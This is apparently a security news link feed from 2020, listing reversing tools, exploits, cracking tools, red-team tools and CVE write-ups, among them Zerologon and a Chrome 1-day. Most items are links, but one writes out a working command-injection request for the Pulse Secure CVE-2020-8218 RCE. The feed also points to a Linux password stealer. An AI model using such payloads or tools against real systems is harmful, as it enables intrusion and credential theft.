idapm is IDA Plugin Manager via GitHub Repository https://github.com/tkmru/idapm #reverse #ida

Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md

1day exploit for chrome version <= 83.0.4103.61

https://github.com/r4j0x00/exploits

https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974

CVE-2020-8218 : Pulse Secure SSL-VPN post-auth RCE


hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc

https://isc.sans.edu/diary/26254

Broken phishing accidentally exploiting Outlook zero-day

When we think of zero-days, what comes to mind are usually RCEs or other high-impact vulnerabilities. Zero-days, however, come in all shapes and sizes and many of them are low impact, as is the vulnerability we’re going to discuss today. What is interesting about it, apart from it allowing a sender of an e-mail to include/change a link in an e-mail when it is forwarded by Outlook, is that I noticed it being exploited in a low-quality phishing e-mail by what appears to be a complete accident.

#analysis #phishing #exploit

Offensive security officialy announces it launch of dedicated lab play grounds with previous oscp retired machines added occasionally and upto 3hrs of free acess to all

https://www.offensive-security.com/labs/individual/?utm_campaign=Proving%20Grounds%20Individual&utm_content=138805717

https://github.com/mxrch/penglab

Penglab

Penglab is a ready-to-install setup on Google Colab for cracking passwords with an incredible power, really useful for CTFs.

‌#tools #opensource #crack #gpu

Blind SQLi and filter bypass.

http://www.mannulinux.org/2020/09/sql-injection-filter-bypass-to-perform.html

HashCat added support to crack password-protected RAR 3 archives without header encryption (both compressed and uncompressed).

https://github.com/hashcat/hashcat/pull/2542

ARM64 Reversing and Exploitation
Part 1: http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/
Part 2: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/
Part 3: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/

StreamDivert: Relaying (specific) network connections

The first part of this blog will be the story of how this tool found it’s way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.

https://research.nccgroup.com/2020/09/10/streamdivert-relaying-specific-network-connections/
#redteaming #windows #tools

Iran denies any involvement in the attack against 2020 US election
https://ift.tt/3ihEQud

Word Document Malware Analysis

https://malwr-analysis.com/2020/09/07/word-document-malware-analysis/

Flare-on is Live!
https://2020.flare-on.com
#reverse #ctf #flareon

Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)

https://www.secura.com/pathtoimg.php?id=2055

Pentest AWS Credentials That Had Been Leaked

https://medium.com/@ahmed2061559.aa/pentest-aws-credentials-that-had-been-leaked-8a59ece67d2d